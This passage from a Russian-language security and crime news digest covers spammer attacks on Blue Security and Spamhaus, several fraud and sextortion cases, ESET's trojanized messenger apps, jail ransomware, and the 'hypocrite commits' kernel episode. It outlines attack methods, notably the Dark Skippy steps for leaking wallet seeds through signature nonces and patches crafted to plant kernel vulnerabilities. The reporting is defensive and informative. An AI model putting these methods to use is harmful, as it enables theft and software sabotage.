Соответственно, клиенты Blue Security будут обвинены в участии в атаках и рассылки спама, предупреждали авторы письма. А сам список адресов клиентов компании будет опубликован и станет доступен для спамеров, после чего поток рассылаемого на эти адреса спама вырастит в десятки раз, предупреждалось в письмах. Также злоумышленники написали сотрудникам Blue Security письма о том, что они обладают базой адресов 70% клиентов компании, и за оставшиеся 30% они готовы заплатить $50 тыс.
Затем участник форума Spamdot.biz под ником BoT придумал способ атаковать саму компанию. Спамеры зарегистрировал ряд доменов, с которых стояла переадресация на подконтрольный злоумышленникам ресурс. Пользователей Blue Security стали забрасывать большим потоком спама с возможностью «отписаться». Когда пользователи нажимали эту кнопку, они через подставные домены попадали на упомянутый сайт.
С началом массовой рассылки спамеры поставили переадресацию с подконтрольного им ресурса на сайт Blue Security. После чего сайт компании стал недоступен. Гендиректор канадского хостинг-провайдера Tucows Эллиот Носс (Elliot Noss), обслуживавшего сайт Blue Security, сообщил, что лишь несколько интернет- компаний в мире смогли бы справиться с такой атакой.
Атака продолжалась две недели. Blue Security распространил сообщение об этом в своем блоге на платформе Blogs.com, обслуживаемой компанией Six Apart (владела в те годы сервисом Livejournal), и поставил переадресацию со своего сайта на эту страницу. После этого под атакой оказались сервера Six Apart, из-за чего начались проблемы с доступом ко многим обслуживаемым данной компанией блогам.
BoT высказывал также предложение поставить переадресацию с ресурса, куда попадают пользователи Blue Security, на сайты крупных СМИ наподобие BBC, Reuters и CNN. Те бы стали писать о том, что функционирование мирового интернета находится под угрозой из-за деятельности Blue Security. По подсчетам Кребса, атака обошлась ее устроителям в $15 тыс.
Спамеры перешли к прямым угрозам и гендиректору Blue Security Эрену Решефу (Eren Reshef) и его семье. Так, ему прислали фотографии его детей, которые он сам до этого не видел. Компания пыталась обращаться за защитой в ФБР, но дальше формальной защиты дело не сдвинулось.
В результате создатели Blue Security вывесили «белый флаг» и согласились не переговоры. С этой целью злоумышленники прислали Решефу ссылку на один из сайтов с продажей фармацевтических препаратов, в HTML-коде которого содержалось написанное на транслите сообщение: «preved, stuchis v asku» (далее был указан номер мессенджера ICQ, которым пользовались злоумышленники). В разговоре по ICQ человеком с ником Pharmaster предупредил гендиректора Blue Security, что ему предстоит понять, с кем они связался, и что системы компании будут выведены из строя на несколько месяцев.
Тодд Андервуд (Todd Underwood), гендиректор занимающейся интернет- безопасностью компании Renesys, говорит, что когда только Blue Security представила свою бизнес-модель, эксперты сразу назвали ее «ужасной» и предупредили о побочных последствиях. «Однако история компании печальна, так как она закончилась победой спамеров», - заключает Андервуд. Кребс отмечают, что индустрия спама приносила ее создателям миллионы долларов в месяц, а компания Blue Security, став угрозой для их бизнеса, за это поплатилась.
Кто заказал уничтожение Blue Security
Кребс пишет, что за организации атак против Blue Security стояли пользователи форума Spamdot.biz под никами Mr. Green и Zliden. Согласно данным организации Spamhaus, занимающейся борьбой со спамом, за этими никами скрывались Влад Хохольков и Лео Куваев соответственно. Они оба известны как организаторы партнерских программ по распространению фармацевтических препаратов в интернете, включая Mailien и Rx-Partners.
Куваев жил в США и был обвинен в организации DDoS-атак, распространении пиратского ПО и рассылке спама. Суд обязал Куваева выплатить штраф в размере $37 млн из-за продаж пиратских копий ПО Microsoft. После этого он вернулся в Россию. Здесь его обвинили в педофилии и в 2012 г. осудили на 20 лет (впоследствии срок заключения сократили до 10 лет).
Вскоре после атаки на Blue Security, Mr Green попросил администрацию форума Spamdot.biz удалить его аккаунт и все его сообщения. Однако копии оставленных им сообщений остались в качестве цитат в сообщениях других пользователей форума, из чего Кребс и сделал вывод о том, кто стоял за атакой. Впрочем, сам Хохольков в переписке с Кребсом отверг за свою роль в этой истории.
Как спамеры атаковали Spamhaus
Другой, более распространенный метод борьбы со спамом, состоит в формировании черного списка IP-адресов, с которых распространяется спам. Сюда попадают как адреса хостинг-провайдеров, не препятствующих распространению спама, так и адреса компьютеров зараженных пользователей. Сообщения с данных адресов могут фильтроваться интернет-провайдерами и организациями для сокращения потоков спама. Наиболее известными организациями, составляющими такие списки, являются URIBL, SURBL и упомянутая Spamhaus.
Осенью 2008 г. на форуме Spamdot.biz начался сбор средств для организации DDoS-атаки против упомянутых организаций, а также против созданной основателем Spamhaus Стивом Линфордом (Steve Linford) компании uxn.com и ресурса ultradesign.com, хранящего резервные копии базы Spamhaus. Администратор форума под ником Ika сообщил, что для организации атаки собрано $3 тыс, еще $1 тыс была потрачена на покупку ботов по цене $25 за 1 тыс.
В соответствующем обсуждении на Spamdot.biz представитель одной из партнерских программ по распространению фармацевтических препаратов – Afiilate Connection – сообщил, что связанные с ней спамеры готовы предоставить миллионы зараженных ими компьютеров для участия в атаке. Однако, предупреждал представитель Affilate Connection, в ответ борцы со спамом могут внести в «черные списки» все участвующие в атаки компьютеры, что лишит спамеров возможных заработков с их помощью. Кроме того, организации по борьбе со спамом обзавелись инфраструктурой для отражения DDoS-атак.
Спамер с ником Gera, создавший ботнет Grum и участвующий в партнерских программах по распространению фармацевтических препаратов в интернете, призывал других спамеров принять участие в атаке и «помочь индустрии». «Я обращаюсь к крупным спамерам: вы зарабатываете на комиссиях от $50 тыс. до $200 тыс. в месяц, неужели вам сложно выделить $3 тыс. для решения данной проблемы?» - спрашивал Gera. Кребс, изучив использовавшийся Gera электронный кошелек в системе Webmoney, полагает, что этим ником пользовался Николай Косторгыз.
Пользователь с ником Docent, создатель ботнета Mega-D, соглашался принять участие в финансировании будущей атаки. С другой стороны, пользователь с ником Severa, создатель ботнетов Waleac и Storm, неожиданно выступил против атаки. По его мнению, весьма нетипичному для спамеров, жизнь без антиспам-фильтров уже нельзя представить: они ставят барьер от неопытных спамеров.
«Представьте, что будет, если все антиспам-фильтры перестанут работать, - предупреждал Severa. – Сможете ли вы тогда заработать деньги? Нет! В этом случае электронная почта просто перестанет существовать как вид коммуникаций. Поэтому, Spamhaus – это не хорошо и не плохо: Spamhaus – это просто Spamhaus». По мнению Spamhaus, за ником Severa стоял хакер Петр Левашов, который в 2017 г. был арестован в Испании и затем экстрадирован в США, где его приговорили к 33 месяцам заключения.
Другой пользователь форума с ником Swank согласился с Severa, но лишь частично. «Действительно, антиспам-фильтры полезны для интернета, так как обе стороны – спамеры и борцы с ними – постоянно совершенствуются в борьбе с другом, - рассуждал Swank - Это позволят технологиям постоянно улучшаться и дает защиту от неопытных спамеров, сохраняя доход для профессионалов. Однако «тупые» организации наподобие Spamhaus ведут себя нечестно по отношении к организаторам легитимных email-рассылок. Spamhaus ненавидит email-маркетинг как таковой, независимо от того, является ли рассылка легитимной или нет. Поэтому этой организации следует дать понять, что она не является неприкасаемой».
В октябре 2008 г. Gera анонсировал атаку против Spamhaus с помощью специально разработанного ПО – Anti-haus v. 1.0, которое должно было распространяться среди владельцев крупнейших ботнетов. Впрочем, в самом Spamhaus Кребсу заявили, что в тот период времени организации не зафиксировала крупных атак против своей инфраструктуры.
Однако крупная атака против Spamhaus все-таки состоялась – в марте 2013 г. Тогда ряд хостинг-провайдеров, размещающих незаконные материалы (bluetproof), объединились в коалицию под названием Stophaus и создали соответствующий онлайн-форум. Атака стала местью Spamhaus за то, что организация внесла в черные списки адреса одного из таких хостинг-провайдеров – голландского CB3ROB (другое название – Cyberbunker).
Атака продолжалась девять дней, ее мощность достигала 300 Гбит/с. Атака была организована с помощью ложных запросов к DNS-серверам, которые в качестве ответов отправляли сообщения атакуемым ресурсам. Атака создала проблемы для миллионов пользователей ресурсов, размещенных на площадках одного из крупнейших в мире хостинг-провайдеров CloudFlare (обслуживает Spamhaus). Атаке также подверглись точки обмена трафиком в Лондоне, Амстердаме, Франкфурте и Гонконге.
Впоследствии по обвинению в организации атаки в Испании был арестован гражданин Нидерландов Свен Олаф Кампфуйс (Sven Olaf Kamphuis), которого затем экстрадировали на родину. Правда, сам обвиняемый отрицал свое участие в атаке, утверждая, что они лишь является пресс-секретарем CB3ROB.
Как мошеннические приемы использовались против спама
Существуют и другие формы борьбы со спам. Одну из идей на этот счет предложил активист Адам Дрейк (Adam Drake), создатель посвященного борьбе со спамом форума Inboxrevenge.com. Идея Дрейка состояла в автоматическом создании большого числа фиктивных телефонных заказов на покупку фармацевтических препаратов через упомянутые партнерские программы, содержащих ложные контактные данные и номера банковских карт. Таким образом, спамеры вынуждены были бы вручную проверять заказы, отправка заказов реальных пользователям замедлилась бы, что в итоге должно было снизить интерес к клиентам к подобного рода схемам.
В районе 2007 г. таким образом спамерам каждый день отправлялось 20-30 тыс. ложных заказов. В ответ спамеры создали системы для борьбы с мошенническими заказами (antifraud), проверяя данные заказов и помечая их как «высокорискованные». Но эта же система стала отбраковывать и легитимные заказы.
Изучение базы клиентов Spamit и Glavmed, имеющихся в распоряжении Брайана Кребса, показало, что в данных партнерских программах как рискованные помечались даже заказы со средней степенью подозрительности. Например, причиной для отклонения заказа могло стать указание телефонного номера, не совпадающего с ZIP-кодом адреса, связанного с банковской картой заказчика. «Наша идея принесла спамерам денежные потери», - радуется Дрейк.
Спамер Игорь Вишневский, один из создателей бот-нета Cutmail, говорит, что созданная спамерами система борьбы с мошенничеством принесла им дополнительную выгоду: они блокировала фальшивые заказы от партнеров, которые генерировали их с помощью украденных данных банковских карт. Такого рода заказы приносили спамерам убытки не только из-за стоимости телефонных звонков, но и привлекали внимание международных платежных систем, борющихся с мошенничеством с помощью банковских карт.
Кроме того, для того, чтобы противодействовать борцам со спамом, спамеры применили новую тактику: они стали создавать большое число сайтов по продаже фармацевтических препаратов, не давая какому-либо сайту возможности долго работать. В результате пользователь, нажав ссылку в спам-сообщении с рекламой фармацевтических препаратов, попадал на иной сайт, недели пользователь, нажавший ссылку в аналогичном сообщении за несколько секунд до того. Также в партнерских программах Spamit и Glavmed создавались «черные списки» адресов сотрудников Mastercard, Visa и фармацевтических компаний, дабы избежать отправки заказов им и не попасть в проводимые ими проверки.
В Таиланде супружеская пара стала фигурантом дела о мошенничестве, связанного с продажей поддельных золотых украшений через социальные сети.
Этот скандал вскрыл нарушения в сфере онлайн-продаж. Молодожены рекламировали свои "золотые" изделия через прямые эфиры, убеждая покупателей в их высоком качестве и чистоте золота — 99,99%. Однако некоторое время спустя клиенты обнаруживали, что приобретенные драгоценности не содержат золота вовсе.
Первоначальные подозрения возникли, когда желающие перепродать свои украшения столкнулись с отказами в ювелирных магазинах из-за отсутствия стандартной маркировки. В итоге более 300 пострадавших обратились в полицию с коллективными заявлениями о возбуждении дела против супругов.
Покупатели утверждают, что пара использовала ложную рекламу и манипуляции во время трансляций для обмана своих клиентов. Во время расследования полиция собрала доказательства покупок и результаты экспертиз, которые подтвердили отсутствие золота в ювелирных изделиях.
Генерал Виттхая Срипрасертпаб, глава отдела по защите прав потребителей, заявил, что публичное мошенничество является уголовным преступлением и может грозить длительным сроком заключения. Каждая сделка рассматривается как отдельный эпизод мошенничества, за который можно получить до пяти лет тюрьмы.
Супруги также могут быть обвинены в введении в заблуждение и нарушении торговых правил. Следствие выявило наличие у семьи мошенников предметов роскоши, включая автомобили на общую сумму около 120 миллионов батов, среди которых Porsche 911 Carrera и Lamborghini.
Генеральная прокуратура предупреждает о растущих угрозах в электронной коммерции, когда недобросовестные продавцы могут обманывать покупателей, не отправляя товар или продавая подделки даже под известными брендами. Полиция призывает к осторожности, рекомендуя проверять регистрацию продавцов в Ассоциации торговцев золотом Таиланда.
В настоящее время Корнканок Суванбут и Канпон Руэнг-арам обвиняются в публичном мошенничестве, введении ложных данных в базу данных, публикации неверной информации и нарушении правил торговли. Следствие также рассматривает возможность предъявления дополнительных обвинений в связи с незаконной коммерческой деятельностью.
bangkokpost.com/thailand/special-reports/2883158/golden-promises-fail-to- measure-up
Следственным управлением УСК по Брестской области установлены обстоятельства незаконного распространения реквизитов банковских платежных карточек, совершенного 20-летним жителем Ивацевичей. Счета использовались киберпреступниками для оборота похищенных денежных средств.
По данным следствия, молодой человек нашел в интернете подработку, связанную с продажей реквизитов банковских карт. Для этого житель Ивацевичей обращался к знакомым, просил за символическую плату на свои имена зарегистрировать счета в банках и предоставить ему доступ к личным кабинетам в системе «Интернет- банкинг». Некоторые из так называемых дропов помогали находить подставных лиц из своего окружения. Полученные реквизиты обвиняемый продавал анонимным покупателям, которые использовали счета для незаконных транзакций.
В результате проведения оперативно-розыскных мероприятий сотрудники милиции выявили и пресекли преступную схему.
В ходе следствия установлено, что житель Ивацевичей завладел реквизитами банковским платежных карт не менее 45 подставных лиц. Позже киберпреступники, осуществляя махинации, «провели» по этим счетам не менее 280 тысяч рублей.
Кроме того, установлен факт вовлечения в преступную деятельность 15-летней девочки. По просьбе обвиняемого подросток предоставила ему реквизиты банковских карт двоих знакомых.
Молодой человек раскаялся в содеянном и сотрудничал со следствием.
Жителю Ивацевичей предъявлено обвинение по ч.2 ст.222 (незаконный оборот средств платежа) и ч.3 ст.172 (вовлечение несовершеннолетнего в совершение тяжкого преступления) Уголовного кодекса Республики Беларусь. К нему с санкции прокурора применена мера пресечения в виде домашнего ареста.
Эксперты ESET Research обнаружили троянские аналоги Telegram и WhatsApp для Android и Windows, нацеленные на кражу криптовалют.
#ESETResearch reports on new #Android and #Windows #cryptocurrency clippers in the form of trojanized #WhatsApp and #Telegram apps. This is the first time we've seen Android clippers focusing on instant messaging. https://t.co/BY9oa17Hzl @LukasStefanko 1/4
Click to expand...
Содержащиеся в мессенджерах клипперы заменяют отправленные в чат пользовательские кошельки адресами злоумышленников. Приложения для Android также используют OCR для чтения текста со скриншотов и фотографий, хранящихся на устройстве жертвы. Таким образом хакеры способны похитить seed-фразу.
Один из пакетов вредоносных программ для Windows состоит не из клипперов, а из RAT, которые обеспечивают полный контроль над системой жертвы без необходимости перехватывать поток сообщений.
На текущем этапе приложения-подражатели нацелены на жителей Китая, где Telegram и WhatsApp заблокированы уже несколько лет. По этой причине пользователи часто пытаются скачать мессенджеры обходными путями.
Для привлечения потенциальных жертв хакеры настроили объявления Google Ads, ведущие к мошенническим YouTube-каналам, которые затем перенаправляли зрителей на сайты-подражатели Telegram и WhatsApp. Сейчас доступ к этой рекламе закрыт администрацией Google.
source: twitter.com/ESETresearch/status/1636325690302779392
В мире криптовалют появилась серьезная угроза безопасности под названием Dark Skippy. Метод позволяет злоумышленникам извлекать секретные ключи из устройств для подписи транзакций, таких как аппаратные кошельки. Атака была обнаружена в контексте устройств для подписи биткоин-транзакций, но потенциально может применяться и в других областях.
Для реализации атаки Dark Skippy необходимо, чтобы устройство для подписи было скомпрометировано вредоносной прошивкой. На момент обнаружения уязвимости случаев применения Dark Skippy в реальных условиях зафиксировано не было. Однако потенциальная опасность атаки остается высокой, учитывая ее эффективность и скрытность.
Суть атаки заключается в возможности модификации прошивки устройства для подписи, чтобы оно незаметно встраивало части секретного ключа в подписи транзакций. Ранее считалось, что для полного извлечения секретного ключа требуются десятки подписей. Однако исследователи показали, что достаточно всего двух подписей, чтобы скомпрометировать устройство. Однократное использование взломанного аппаратного кошелька может привести к потере всех средств.
Процесс атаки Dark Skippy состоит из нескольких этапов:
1. Компрометация устройства для подписи : Злоумышленник модифицирует прошивку устройства. Модификация может произойти тремя способами:
• Физическое вмешательство в устройство
• Обман пользователя, который сам устанавливает вредоносную прошивку
• Внедрение вредоносных устройств в цепочку поставок
2. Использование модифицированной функции подписи : Вместо стандартной схемы Шнорра, использующей случайные 32-байтовые одноразовые числа (nonce), вредоносная прошивка применяет слабые числа с низкой энтропией. Числа представляют собой части извлекаемого секретного ключа. Для 12-словной seed- фразы (общим объемом 16 байт) процесс разделяется на две части:
• Первые 8 байт используются для nonce первой подписи входа транзакции
• Оставшиеся 8 байт применяются для nonce второй подписи входа
3. Мониторинг транзакций : Атакующий сканирует пул неподтвержденных транзакций (mempool) в поисках подписей, созданных скомпрометированным устройством.
4. Извлечение секретных данных : При обнаружении подозрительной транзакции злоумышленник применяет специальный алгоритм, такой как алгоритм кенгуру Полларда, для восстановления секретных одноразовых чисел из публичных данных подписи.
5. Реконструкция секретного ключа : Восстановленные части объединяются, образуя полный 16-байтовый секретный ключ устройства, который представляет собой энтропию 12-словной seed-фразы.
Название «Dark Skippy» происходит от алгоритма кенгуру Полларда, используемого для извлечения секретных данных из подписей. «Skippy» – отсылка к кенгуру, а «Dark» (темный) подчеркивает скрытную природу атаки.
Более сложные версии атаки могут включать дополнительные меры для усложнения обнаружения. Злоумышленники могут использовать «ослепление» одноразовых чисел с помощью встроенного в устройство ключа атакующего. Кроме того, они могут добавлять «водяные знаки» в транзакции, чтобы легче идентифицировать их в блокчейне.
Атака Dark Skippy обладает рядом преимуществ:
• Скрытность: обнаружить атаку практически невозможно.
• Отсутствие дополнительных каналов связи: данные извлекаются через стандартные транзакции в сети Биткоин.
• Работоспособность против устройств без внутреннего состояния: атака может быть выполнена в рамках одной транзакции с несколькими входами.
• Извлечение мастер-ключа: атака позволяет получить доступ ко всему кошельку, извлекая seed-фразу.
• Влияние на всех пользователей взломанного устройства: даже если пользователь самостоятельно генерирует безопасную seed-фразу, он все равно уязвим.
Атака была обнаружена Робином Линусом в ходе обсуждения в Twitter*. Дальнейшие исследования показали, что извлечение 12-словной seed-фразы возможно даже с использованием обычного ноутбука, что делает атаку еще более опасной, чем предполагалось изначально.
Хотя концепция скрытых каналов в одноразовых числах подписей обсуждалась и ранее, Dark Skippy представляет собой наиболее эффективную реализацию этой идеи на сегодняшний день.
Исследователи Ллойд Фурнье, Ник Фэрроу и Робин Линус, обнаружившие уязвимость, 8 марта 2024 года приватно сообщили о ней примерно 15 различным производителям оборудования. Цель этого шага – собрать отзывы о релевантности угрозы в рамках существующих моделей безопасности, обсудить идеи по смягчению последствий и подготовить публичное раскрытие информации.
Публикация демонстрационного кода атаки планируется примерно в сентябре 2024 года. Код позволит создавать вредоносные подписи, идентифицировать затронутые транзакции в пуле неподтвержденных транзакций и декодировать извлеченные seed- фразы.
Для защиты от Dark Skippy рекомендуется использовать устройства, реализующие протоколы подписи с защитой от извлечения данных (anti-exfil).Исследователи также предлагают новые идеи по смягчению последствий атаки, требующие значительного обсуждения и вклада разработчиков. Полное раскрытие информации о Dark Skippy, включая демонстрационный код, планируется на сентябрь 2024 года. Этот код позволит создавать вредоносные подписи, выявлять затронутые транзакции в mempool и декодировать похищенные сид-слова.
• Source: https://darkskippy.com/
Сервис по блокировке спама SORBS (Spam and Open Relay Blocking System), принадлежавший компании Proofpoint и существовавший с 2001 года, прекратил работу.
SORBS предоставлял бесплатный доступ к списку для блокировки на основе DNS (DNS-based Block List, DNSBL), в который входили более 12 млн серверов, распространяющих спам, занимающихся фишингом и другими вредоносными почтовыми рассылками. В этом списке числились почтовые серверы, которые подозревались в рассылке или ретрансляции спама, а также взломанные, захваченные и зараженные малварью серверы.
Сервис существовал более двадцати лет: он был создан в 2001 году Мишель Салливан (Michelle Sullivan), которая руководила им, будучи сотрудником Proofpoint в Австралии. Данные SORBS использовали более 200 000 организаций по всему миру, и сервис высоко ценился за свою точность.
Когда журналисты The Register поинтересовались у представителей Proofpoint о причинах прекращения работы SORBS, в компании сделали следующее заявление:
«Решение о прекращении работы продукта никогда не бывает простым, и оно было принято после тщательного рассмотрения различных факторов, влияющих на устойчивость сервиса. Мы можем подтвердить, что SORBS был выведен из эксплуатации 5 июня 2024 года, и сервис больше не предоставляет репутационные данные. Учитывая наличие на рынке широкого спектра потенциальных решений для замены [SORBS], Proofpoint не может давать рекомендации или поддерживать какой-либо конкретный продукт в качестве замены, все зависит от потребностей организации».
Click to expand...
При выводе из эксплуатации SORBS его «зоны» (18 списков, каждый из которых был посвящен отдельному классу спамерских серверов) были полностью очищены.
Журналисты полагают, что восстановление информации в «зонах» не потребует особых усилий, ведь кодовая база сервиса неповреждена. Поэтому перезапуск SORBS все еще возможен. Так, новость о закрытии SORBS уже вызвала в антиспамерском сообществе обсуждения о возможном приобретении проекта.
Дело в том, что ранее SORBS уже существовал в трех разных формах. Так, когда Мишель Салливан только создала сервис, он размещался в инфраструктуре, принадлежащей университету, в котором она тогда работала. Однако со временем влияние SORBS на университетскую сеть возросло до такой степени, что руководство вуза потребовало перенесли SORBS в другое место. В результате проект приобрел поставщик ПО GFI Software, а через несколько лет GFI передала SORBS компании Proofpoint, которая владела сервисом с тех пор, предоставив Салливан соответствующую должность.
По информации The Register, в настоящее время стоимость хостинга и операционных расходов сервиса находятся на таком уровне, что физическое лицо попросту не сможет взять их на себя.
Кроме того, источники издания сообщают, что интерес к приобретению SORBS проявляют и спамеры, которые на протяжении многих лет интересовались сервисом в преступных целях. Антиспамерское сообщество по понятным причинам надеется, что обязательства по управлению SORBS возьмут на себя не злоумышленники, а легитимные стороны.
Хотя Proofpoint справедливо отмечает, что на рынке существуют альтернативы (например, SpamCop и Spamhaus) одним из главных аспектов работы SORBS всегда была его прозрачность. В работе блок-листов это имеет первостепенное значение, поскольку их операторы могут серьезно усложнить жизнь всем, кто зарабатывает на жизнь рассылкой электронных писем.
Так, в SORBS действовала система тикетов поддержки, а сотрудники документировали все обсуждения и тщательно их архивировали. Таким образом, сервис обладал многолетними записями, которые документировали весь процесс принятия решений и содержали доказательства того, что SORBS не принимает сиюминутных решений, а также не используется для мести и сведения счетов.
Компания Kudelski Security, специализирующаяся на проведении аудита безопасности, [опубликовала](https://research.kudelskisecurity.com/2021/06/30/oramfs- resizable-oram-remote-storage-agnostic-written-in-rust/) файловую систему Oramfs с реализацией технологии ORAM (Oblivious Random Access Machine), маскирующей характер доступа к данным (data access pattern). Проектом предложен FUSE-модуль для Linux с реализацией слоя ФС, не позволяющего отследить структуру операций записи и чтения. Код Oramfs написан на языке Rust и распространяется под лицензий GPLv3.
Технология ORAM подразумевает создание ещё одного слоя помимо шифрования, не позволяющего определить характер текущей активности при работе с данными. Например, в случае применения шифрования при хранении данных в стороннем сервисе, владельцы данного сервиса не могут узнать сами данные, но могут определить к каким блокам осуществляется обращение и какие выполняются операции. ORAM скрывает информацию о том к каким частям ФС производится доступ и какая именно операция выполняется (чтение или запись).
Oramfs предоставляет универсальную файловую систему-прослойку, позволяющую упростить организацию хранения данных на любых внешних хранилищах. Данные сохраняются в зашифрованном виде c опциональной возможностью проверки подлинности. Для шифрования могут использоваться алгоритмы ChaCha8, AES-CTR и AES-GCM. Закономерности при доступе на запись и чтение скрываются с использованием схемы Path ORAM. В будущем намечена реализация и других схем, но в текущем виде разработка пока находится на стадии прототипа, который не рекомендуется использовать в рабочих системах.
Oramfs может использоваться с любыми ФС и не зависит от типа целевого внешнего хранилища - возможна синхронизация файлов в любой сервис, который можно примонтировать в форме локального каталога (SSH, FTP, Google Drive, Amazon S3, Dropbox, Google Cloud Storage, Mail.ru Cloud, Яндекс.Диск и другие сервисы, поддерживаемые в rclone или для которых имеются FUSE-модули для монтирования). Размер хранилища не фиксирован и при необходимости дополнительного пространства размер ORAM может динамически увеличиваться.
Настройка Oramfs сводится к определению двух каталогов - публичного и приватного, которые выполняют роль сервера и клиента. Публичный каталог может быть любой директорией в локальной ФС, которая связана с внешними хранилищами путём их монтирования через SSHFS, FTPFS, Rclone и любые другие FUSE-модули. Приватный каталог предоставляется FUSE-модулем Oramfs и предназначен для непосредственной работы с файлами, хранимыми в ORAM. В публичном каталоге размещается файл с образом ORAM. Любая операция с приватным каталогам отражается на состоянии этого файла-образа, но данный файл выглядит для внешнего наблюдателя как чёрный ящик, изменения в котором невозможно ассоциировать с активностью в приватном каталоге, в том числе нельзя определить выполнена операция записи или чтения.
Oramfs может применяться в областях, в которых необходимо добиться наивысшего уровня конфиденциальности и можно пожертвовать производительностью. Производительность снижается так как каждая операция с хранилищем, в том числе операции чтения данных, приводят к перестроению блоков в образе ФС. Например, чтение файла размером 10МБ занимает около 1 секунды, а 25МБ - 3 сек. Запись 10 МБ занимает 15 секунд, а 25МБ - 50 секунд. При этом Oramfs примерно в 9 раз быстрее при чтении и в 2 раза быстрее при записи по сравнению с файловой системой UtahFS, развиваемой компанией Cloudflare и опционально поддерживающей режим ORAM.
Хакерская атака при использовании программы-вымогателя на тюрьму в округе Берналилло в штате Нью-Мексико [привела к отключению](https://www.abqjournal.com/2459954/cyber-attack-leads-to-jail- lockdown-settlement-violations.html) видеонаблюдения и блокировке автоматических дверей. В результате заключенные не могли санкционированно покинуть камеры, а тюремные системы были отключены.
Издание Albuquerque Journal пишет, что инцидент произошел 5 января в тюрьме недалеко от Альбукерке.
Интернет-сервисы пенитенциарного учреждения были отключены, что лишило заключенных доступа в сеть и связи. Тех, кто на момент атаки находились вне камер, определили в изоляторы.
Администрация тюрьмы сообщает, что в ходе инцидента была повреждена и временно недоступна база данных тюрьмы, которая содержала сведения о драках, применении силы и сексуальных домогательствах.
Прокурор округа Тейлор Ран сообщила, что персонал учреждения использовал ключи, чтобы вручную открыть заблокированные двери. В день инцидента были отключены камеры наблюдения, что является самым тревожным обстоятельством атаки, добавляет Ран.
Помимо этого, сотрудники не могли получить доступ к базам данных местных органов власти, поэтому ряд государственных учреждений Берналилло был временно закрыт. По состоянию на 10 января многие члены самоуправления округа [продолжали работать](https://www.bernco.gov/blog/2022/01/10/alvarado-square- open-on-lobby-level-only/) удаленно, пока технические специалисты устраняют проблемы, вызванные программой-вымогателем.
Отключение коммуникаций может привести к искам в отношении администрации, поскольку это нарушает Соглашение от 1995 года, которое предусматривает право заключенных на получение регулярного доступа к телефонной и другим типам связи.
Администрация тюрьмы предупредила Федеральный суд США, что для заключенных будет ограничен доступ к телефонам и планшетам.
По данным следствия, обвиняемый, узнав, что бизнесмен из Сочи хочет купить в Грузии одну тысячу тонн мандаринов, предложил посреднические услуги по содействию в приобретении и поставке фруктов. Предприниматель согласился и перевёл ему почти 42 млн рублей, однако цитрусовые так и не получил.
В свою очередь злоумышленник перестал выходить на связь, а полученными от потерпевшего деньгами распорядился по своему усмотрению.
Оперативное сопровождение уголовного дела осуществляли сотрудники краевой полиции.
На период расследования уголовного дела, возбуждённого по ч. 4 ст. 159 УК РФ, обвиняемому избиралась мера пресечения в виде заключения под стражу. В настоящее время материалы с утверждённым обвинительным заключением направлены в суд для рассмотрения по существу.
В США завершился судебный процесс по делу о сексуальной эксплуатации и шантаже более 100 человек, включая 11 несовершеннолетних. Граждане Нигерии Самуэль и Самсон Огоши были приговорены к 17,5 годам тюремного заключения и 5 годам под надзором за участие в международной сети вымогателей, действовавшей в интернете. Кроме того, действия двух братьев привели к смерти 17-летнего школьника из Мичигана, который покончил с собой после того, как стал жертвой вымогательства.
По данным Минюста США, братья Огоши использовали взломанные аккаунты в соцсетях для создания поддельных профилей, представляясь молодыми девушками. Огоши вступали в переписку с подростками и другими жертвами, убеждая их прислать интимные фотографии. Получив такие материалы, преступники начинали шантажировать своих жертв, угрожая распространить изображения среди их родственников, друзей и знакомых, если жертвы не переведут деньги. В одном из случаев 17-летний подросток не выдержал давления.
Прокуратура отметила, что данный случай также является напоминанием для родителей и подростков о том, что следует быть осторожными при общении в интернете. Многие преступные сети могут скрываться за безобидными, на первый взгляд, контактами. Ведомство предупредило, что нужно быть внимательным и не делиться личной информацией с незнакомцами.
Расследование показало, что жертвами схемы стали как минимум 11 несовершеннолетних. Правоохранительные органы предполагают, что помимо 17-летнего школьника, также есть и другие случаи смертей, связанные с подобными схемами вымогательства, которые сейчас расследуются в Западном округе Мичигана.
Братья Огоши были экстрадированы из Нигерии в августе 2023 года, после чего признали свою вину. В деле также фигурирует ещё один обвиняемый — Эзекиель Роберт, который в настоящее время оспаривает решение об экстрадиции в нигерийском суде. Помимо этого, в августе 2023 года были предъявлены обвинения пяти гражданам США, подозреваемым в отмывании денег, связанных с этой сетью.
• Source: https://www.justice[.]gov/opa/pr/nigerian-brothers-sentenced- sextortion-scheme-resulted-death-teen
• Source: https://www.justice[.]gov/usao-wdmi/media/1347471/dl?inline
• Source: https://www.justice[.]gov/usao-wdmi/media/1347461/dl?inline
Несколько дней назад Грег Кроа-Хартман (Greg Kroah-Hartman), отвечающий за стабильную ветку ядра Linux, сообщил, что специалистам Университета Миннесоты отныне запрещено отправлять любые изменения в ядро Linux, а все коммиты с адресов @umn.edu будут отклонены.
Дело в том, что три исследователя из Университета Миннесоты (Цюши Ву, Канцже Лу и Адитья Пакки) решили провести эксперимент, который они назвали «лицемерные коммиты». Эксперты умышленно добавляли в код уязвимости, желая продемонстрировать, что потенциально вредоносный код может остаться незамеченным и пройти процесс утверждения.
Для этого исследователи использовали инструмент статического анализа и нашли в коде ядра ряд низкоприоритетных уязвимостей, которые назвали «незрелыми». Затем они создали исправления для них, однако эти патчи лишь усугубляли «незрелые» уязвимости и делали их полноценными. После этого представители университета отправили свои «исправления» сопровождающим ядра, чтобы понять, обнаружат ли разработчики серьезную проблему в их патче для исправления мелкого бага. Получив ответ, исследователи сообщали, что их патч «неправильный», указывали на ошибку в нем и предлагали нормальное исправление.
Когда об этом эксперименте стало известно, Грег Кроа-Хартман откатил около 200 коммитов, пришедших с адресов @umn.edu и отправил их на повторную проверку. Из-за своей деятельности исследователи из Университета Миннесоты подверглись жесткой критике не только со стороны Кроа-Хартмана, но и всего сообщества.
«Нашему сообществу не нравится, когда над ним экспериментируют и “проверяют”, отправляя патчи, которые либо умышленно ничего не делают, либо умышленно вносят в код ошибки», — писал Кроа-Хартман.
Click to expand...
В свою очередь, исследовательская группа сообщает, что уже прекратила данный эксперимент, и в минувшие выходные опубликовала открытое письмо, в котором извиняется перед всем сообществом Linux. Впрочем, многие эксперты отмечают, что извинения скорее похожи на попытки оправдаться и донести свою позицию.
«Мы хотим, чтобы вы знали, что мы никогда намеренно не навредим сообществу ядра Linux и никогда не станем внедрять уязвимости намеренно. Наше исследование проводилось с наилучшими намерениями и было направлено на поиск и устранение уязвимостей.
